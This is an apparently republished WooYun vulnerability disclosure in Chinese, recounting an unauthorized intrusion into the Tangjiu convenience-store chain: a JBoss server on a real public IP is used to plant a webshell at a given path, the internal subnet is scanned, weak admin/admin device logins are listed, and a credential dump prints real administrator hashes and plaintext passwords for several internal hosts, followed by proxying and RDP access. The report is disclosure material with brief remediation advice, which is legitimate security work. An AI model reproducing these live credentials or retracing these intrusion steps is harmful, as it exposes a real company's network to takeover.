好想吃光便利店唐久便利命令执行(administrator内网漫游)

admin

140521
文章

117
评论

2017年5月1日05:05:20评论446 views字数 223阅读0分44秒阅读模式

摘要

2016-03-09：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-23：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-182586

漏洞标题：好想吃光便利店唐久便利命令执行(administrator内网漫游)

漏洞作者： Blcat

提交时间： 2016-03-09 16:24

公开时间： 2016-04-23 16:24

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2016-03-09：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

女神说：如果我是黑客，我就黑了楼下的便利店，天天就有吃的了
ps：唐久便利
企业简介山西省最早的连锁企业之一，五次入选“中国连锁百强企业”。1998年将便利业态首次引入山西，创立“唐久便利”品牌。

详细说明：

code 区域

http://www.tjcvs.cn/
 http://218.26.102.234:7080/开着jboss

于是getshell:

code 区域

http://218.26.102.234:7080//tk/tx.jsp

内网

code 区域

Windows IP Configuration
 
 
 
 
 
 Ethernet adapter VMware Network Adapter VMnet8:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.111.1
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter VMware Network Adapter VMnet1:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.6.1
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter 内网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.0.5
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 192.168.0.254
 
 
 
 Ethernet adapter 移动外网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 10.209.178.82
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.240
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter 电力外网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.130.11
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter 联通外网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.16.2
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . :

探测了下192.168.0.0/24

code 区域

192.168.0.1:80 >>> Open
 192.168.0.2:80 >>> Open
 192.168.0.5:80 >>> Open
 192.168.0.6:80 >>> Open
 192.168.0.7:8080 >>> Open
 192.168.0.12:80 >>> Open
 192.168.0.10:80 >>> Open
 192.168.0.11:8080 >>> Open
 192.168.0.12:8080 >>> Open
 192.168.0.7:80 >>> Open
 192.168.0.11:80 >>> Open
 192.168.0.35:80 >>> Open
 192.168.0.35:8080 >>> Open
 192.168.0.40:80 >>> Open
 192.168.0.40:8080 >>> Open
 192.168.0.43:80 >>> Open
 192.168.0.21:80 >>> Open
 192.168.0.74:80 >>> Open
 192.168.0.77:80 >>> Open
 192.168.0.78:8080 >>> Open
 192.168.0.86:80 >>> Open
 192.168.0.95:80 >>> Open
 192.168.0.99:80 >>> Open
 192.168.0.97:80 >>> Open
 192.168.0.113:80 >>> Open
 192.168.0.116:80 >>> Open
 192.168.0.220:80 >>> Open
 192.168.0.247:80 >>> Open
 192.168.0.253:80 >>> Open
 192.168.0.253:8080 >>> Open
 192.168.0.254:80 >>> Open
 192.168.0.1:80 >>> Open
 192.168.0.2:80 >>> Open

开着代理上去基本锐捷的设备都是admin admin的弱口令

http://192.168.0.113/ 锐捷交换机 admin admin弱口令

http://192.168.0.12 公司主页 www.tjcvs.cn

http://192.168.0.254 rg-wall 1600

http://192.168.0.40:8080/ 另一台jboss

http://192.168.0.6 邮箱

抓了下密码，审核大大帮我打个马

code 区域

msv : 
   [00000002] Primary
   * Username : Administrator
   * Domain   : TJPS101
   * NTLM     : 862a88f861c5719d125db4a78cd0a4a8
   * SHA1     : 56e29165e96ceb73af5994868d8fde5a944256d0
  wdigest : 
   * Username : Administrator
   * Domain   : TJPS101
   * Password : pcg-v505mncp3522996
  kerberos : 
   * Username : Administrator
   * Domain   : TJPS101
   * Password : pcg-v505mncp3522996
  ssp : 
  credman : 
   [00000000]
   * Username : WIN-R1SP37BP6QD/administrator
   * Domain   : 192.168.0.9
   * Password : 
   [00000001]
   * Username : TJPS/hdpos
   * Domain   : tjps
   * Password : faherenfaheren
   [00000002]
   * Username : RFSERVER/hdpos
   * Domain   : 192.168.0.11
   * Password : faherenfaheren
   [00000003]
   * Username : XXBCYW/work
   * Domain   : 192.168.0.162
   * Password : 3306
   [00000004]
   * Username : 192.168.0.5/administrator
   * Domain   : 192.168.0.5
   * Password : pcg-v505mncp3522996
   [00000005]
   * Username : TJFTPSVR/hdpos
   * Domain   : 192.168.0.144
   * Password : faherenfaheren

reGeorgSocksProxy proxy一发

3389两个账号都可以用

然后悲桑的故事，刚才上去还没接着渗透

管理员发现了

我看了看表 3:40

睡了吧，女神的心愿满足不了了

漏洞证明：

code 区域

http://www.tjcvs.cn/
 http://218.26.102.234:7080/开着jboss

于是getshell:

code 区域

http://218.26.102.234:7080//tk/tx.jsp

内网

code 区域

Windows IP Configuration
 
 
 
 
 
 Ethernet adapter VMware Network Adapter VMnet8:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.111.1
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter VMware Network Adapter VMnet1:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.6.1
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter 内网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.0.5
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 192.168.0.254
 
 
 
 Ethernet adapter 移动外网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 10.209.178.82
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.240
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter 电力外网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.130.11
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . : 
 
 
 
 Ethernet adapter 联通外网:
 
 
 
    Connection-specific DNS Suffix  . : 
 
    IP Address. . . . . . . . . . . . : 192.168.16.2
 
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
 
    Default Gateway . . . . . . . . . :

探测了下192.168.0.0/24

code 区域

192.168.0.1:80 >>> Open
 192.168.0.2:80 >>> Open
 192.168.0.5:80 >>> Open
 192.168.0.6:80 >>> Open
 192.168.0.7:8080 >>> Open
 192.168.0.12:80 >>> Open
 192.168.0.10:80 >>> Open
 192.168.0.11:8080 >>> Open
 192.168.0.12:8080 >>> Open
 192.168.0.7:80 >>> Open
 192.168.0.11:80 >>> Open
 192.168.0.35:80 >>> Open
 192.168.0.35:8080 >>> Open
 192.168.0.40:80 >>> Open
 192.168.0.40:8080 >>> Open
 192.168.0.43:80 >>> Open
 192.168.0.21:80 >>> Open
 192.168.0.74:80 >>> Open
 192.168.0.77:80 >>> Open
 192.168.0.78:8080 >>> Open
 192.168.0.86:80 >>> Open
 192.168.0.95:80 >>> Open
 192.168.0.99:80 >>> Open
 192.168.0.97:80 >>> Open
 192.168.0.113:80 >>> Open
 192.168.0.116:80 >>> Open
 192.168.0.220:80 >>> Open
 192.168.0.247:80 >>> Open
 192.168.0.253:80 >>> Open
 192.168.0.253:8080 >>> Open
 192.168.0.254:80 >>> Open
 192.168.0.1:80 >>> Open
 192.168.0.2:80 >>> Open

开着代理上去基本锐捷的设备都是admin admin的弱口令

http://192.168.0.113/ 锐捷交换机 admin admin弱口令

http://192.168.0.12 公司主页 www.tjcvs.cn

http://192.168.0.254 rg-wall 1600

http://192.168.0.40:8080/ 另一台jboss

http://192.168.0.6 邮箱

抓了下密码，审核大大帮我打个马

code 区域

msv : 
   [00000002] Primary
   * Username : Administrator
   * Domain   : TJPS101
   * NTLM     : 862a88f861c5719d125db4a78cd0a4a8
   * SHA1     : 56e29165e96ceb73af5994868d8fde5a944256d0
  wdigest : 
   * Username : Administrator
   * Domain   : TJPS101
   * Password : pcg-v505mncp3522996
  kerberos : 
   * Username : Administrator
   * Domain   : TJPS101
   * Password : pcg-v505mncp3522996
  ssp : 
  credman : 
   [00000000]
   * Username : WIN-R1SP37BP6QD/administrator
   * Domain   : 192.168.0.9
   * Password : 
   [00000001]
   * Username : TJPS/hdpos
   * Domain   : tjps
   * Password : faherenfaheren
   [00000002]
   * Username : RFSERVER/hdpos
   * Domain   : 192.168.0.11
   * Password : faherenfaheren
   [00000003]
   * Username : XXBCYW/work
   * Domain   : 192.168.0.162
   * Password : 3306
   [00000004]
   * Username : 192.168.0.5/administrator
   * Domain   : 192.168.0.5
   * Password : pcg-v505mncp3522996
   [00000005]
   * Username : TJFTPSVR/hdpos
   * Domain   : 192.168.0.144
   * Password : faherenfaheren

reGeorgSocksProxy proxy一发

3389两个账号都可以用

然后悲桑的故事，刚才上去还没接着渗透

管理员发现了好积极的管理员

我看了看表 3:40

睡了吧，女神的心愿满足不了了

修复方案：

打补丁

好好改改内网的弱口令

运维早点休息昨晚打扰了

（想送我零食我是不会拒绝的）

版权声明：转载请注明来源 Blcat@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-09 22:02 | 雷锋 ( 路人 | Rank:12 漏洞数:2 )

1

楼主，来个金虎变流的！！

1# 回复此人
2016-03-09 22:02 | 雷锋 ( 路人 | Rank:12 漏洞数:2 )

1

楼主，来个金虎便利的！！

2# 回复此人

好想吃光便利店唐久便利命令执行(administrator内网漫游)

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-182586

漏洞标题：好想吃光便利店唐久便利命令执行(administrator内网漫游)

相关厂商：唐久便利

漏洞作者： Blcat

提交时间： 2016-03-09 16:24

公开时间： 2016-04-23 16:24

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Blcat@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-182586

漏洞标题： 好想吃光便利店唐久便利命令执行(administrator内网漫游)

相关厂商： 唐久便利

漏洞作者： Blcat

提交时间： 2016-03-09 16:24

公开时间： 2016-04-23 16:24

漏洞类型： 命令执行

危害等级： 高

自评Rank： 20

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Blcat@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(4) 关注此漏洞

漏洞标题：好想吃光便利店唐久便利命令执行(administrator内网漫游)

相关厂商：唐久便利

漏洞类型：命令执行

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分